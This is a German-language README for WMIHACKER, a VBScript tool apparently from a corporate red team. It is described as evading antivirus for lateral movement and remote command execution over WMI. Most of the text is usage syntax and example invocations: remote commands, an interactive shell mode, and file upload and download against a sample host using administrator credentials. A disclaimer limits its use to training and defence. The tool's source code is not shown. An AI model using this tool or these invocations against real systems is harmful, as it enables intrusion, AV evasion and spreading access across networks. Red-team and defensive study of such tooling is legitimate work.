
Ein Tool zur Umgehung von Antivirensoftware für laterale Bewegung und Befehlsausführung
Haftungsausschluss: Die in diesem Projekt verwendete Technologie dient ausschließlich der Sicherheitsschulung und Verteidigung, illegale Nutzung ist verboten!
Testwerkzeug zur Umgehung von Antivirensoftware bei seitlicher Bewegung und Befehlsausführung(Kein Port 445 erforderlich)
Einleitung: Die üblichen WMIEXEC-, PSEXEC-Tool-Befehle erstellen einen Dienst oder rufen Win32_Process.create auf. Diese Methoden werden zu 100 % von Antivirensoftware abgefangen, daher haben wir WMIHACKER entwickelt (Testwerkzeug zur Umgehung von Antivirensoftware bei seitlicher Bewegung und Befehlsausführung(Kein Port 445 erforderlich)).
Hauptfunktionen: 1. Befehlsausführung; 2. Dateiupload; 3. Dateidownload
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
Das Ergebnis wird nach der Ausführung des Befehls angezeigt
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
Nach der Ausführung des Befehls werden keine Ergebnisse angezeigt
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
Shell-Modus
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
Dateiupload: Kopieren der lokalen calc.exe auf den entfernten Host c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
Dateidownload: Herunterladen der calc.exe des entfernten Hosts auf das lokale c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
WMIHACKER ist dem 404Starlink beigetreten